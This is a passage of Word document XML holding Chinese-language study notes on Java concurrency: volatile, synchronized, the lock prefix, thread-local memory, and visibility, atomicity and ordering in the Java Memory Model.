          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到主内存中，主内存中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>变量就会变为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="00EE5AB1">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于已经进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>read,load</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作，在进行运算之后，也会更新主内存</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的变量值为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EE5AB1" w:rsidRPr="00F41A4C" w:rsidRDefault="00EE5AB1" w:rsidP="009F183A">
      <w:pPr>
        <w:pStyle w:val="a4"/>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000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>导致两个线程及时用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键字修改之后，还是会存在并发的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D064A5" w:rsidRPr="005709CA" w:rsidRDefault="00D064A5" w:rsidP="005709CA">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005709CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>java volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="005709CA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D064A5" w:rsidRPr="00001A86" w:rsidRDefault="00D064A5" w:rsidP="00001A86">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>修饰的成员变量在每次被线程访问时，都强迫从共享内存中重读该成员变量的值。而且，当成员变量发生变化时，强迫线程将变化值回写到共享内存。这样在任何时刻，两个不同的线程总是看到某个成员变量的同一个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D064A5" w:rsidRPr="00001A86" w:rsidRDefault="00D064A5" w:rsidP="00001A86">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>在两个或者更多的线程访问的成员变量上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。当要访问的变量已在</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代码块中，或者为常量时，不必使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D064A5" w:rsidRPr="00001A86" w:rsidRDefault="00D064A5" w:rsidP="00001A86">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>当两个并发线程访问同一个对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>中的这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>synchronized(this)</w:t>
      </w:r>
      <w:r w:rsidRPr="00001A86">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同步代码块时，一个时间内只能有一个线程得到执行。另一个线程必须等待当前线程执行完这个代码块以后才能执行该代码块。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163A4B" w:rsidRPr="00927641" w:rsidRDefault="00163A4B" w:rsidP="00163A4B">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3.2</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.1 Lock</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前缀</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1420" w:rsidRDefault="00CB5C4E" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>olatile</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>变量修饰的共享变量进行写操作前会在汇编代码前增加</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>前缀</w:t>
      </w:r>
      <w:r w:rsidR="00B32F95">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C5CFB" w:rsidRDefault="0005307E" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将当前处理器缓存行的数据写回到系统内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F1420" w:rsidRDefault="0005307E" w:rsidP="00D961D2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个写会内存的操作会使其它</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存该</w:t>
      </w:r>
      <w:r w:rsidR="009F1420" w:rsidRPr="00483FF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>内存地址</w:t>
      </w:r>
      <w:r w:rsidR="009F1420">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数据无效</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563593" w:rsidRPr="00927641" w:rsidRDefault="00563593" w:rsidP="00563593">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程本地内存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00563593" w:rsidRDefault="00821DDE" w:rsidP="001D078A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每个线程都有本地内存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本地内存存了该线程以读写共享变量的副本。</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JMM</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抽象概念</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不真实存在。它涵盖了</w:t>
      </w:r>
      <w:r w:rsidR="0058078B" w:rsidRPr="00483FF4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>缓存、写缓冲区、寄存器和其它硬件和编译器优化</w:t>
      </w:r>
      <w:r w:rsidR="0058078B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6168" w:rsidRPr="00927641" w:rsidRDefault="0068074F" w:rsidP="003F6168">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.3.2.3</w:t>
      </w:r>
      <w:r w:rsidR="003F6168">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003F6168">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可见性、原子性、有序性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA06E7" w:rsidRDefault="00AA06E7" w:rsidP="006451FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008444AF">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>有序性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>指的是数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="22B14C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>不相关的变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>在并发的情况下，实际执行的结果和单线程的执行结果是一样的，不会因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="22B14C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>重排序</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>的问题导致结果不可预知。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="22B14C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>volatile, final, synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="22B14C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>，显式锁都可以保证有序性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002103F2" w:rsidRPr="002103F2" w:rsidRDefault="00A02448" w:rsidP="002103F2">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>可见性指的是一个线程对变量的写操作对其他线程后续的读操作可见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>由于现代</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>都有多级缓存，</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>的操作都是基于高速缓存的，而线程通信是基于内存的，这中间有一个</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t xml:space="preserve">Gap, </w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>可见性的关键还是在对变量的写操作之后能够在某个时间点显示地写回到主内存，这样其他线程就能从主内存中看到最新的写的值。</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>synchronized(</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>隐式锁</w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="002103F2" w:rsidRPr="002103F2">
        <w:rPr>
